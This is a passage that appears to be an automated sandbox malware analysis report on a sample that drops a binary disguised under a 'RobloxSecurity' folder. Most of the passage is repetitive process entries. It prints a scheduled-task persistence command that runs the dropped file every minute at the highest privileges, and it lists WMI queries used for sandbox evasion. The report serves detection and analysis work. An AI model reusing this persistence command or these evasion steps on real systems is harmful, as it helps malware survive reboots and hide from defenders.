                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeFile created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

                  Boot Survival

                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Memory allocated: 2A60000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\jqOHOuPMJP.exe Memory allocated: 2D20000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe Memory allocated: 1F996210000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe Memory allocated: 1F9AFDF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1B8A9DF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1B8C3950000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 10DD58D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 10DEF3F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 17A71580000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 17A73090000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1EC01810000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 1EC199B0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 167CFD40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe Memory allocated: 167E9760000 memory reserve | memory write watch
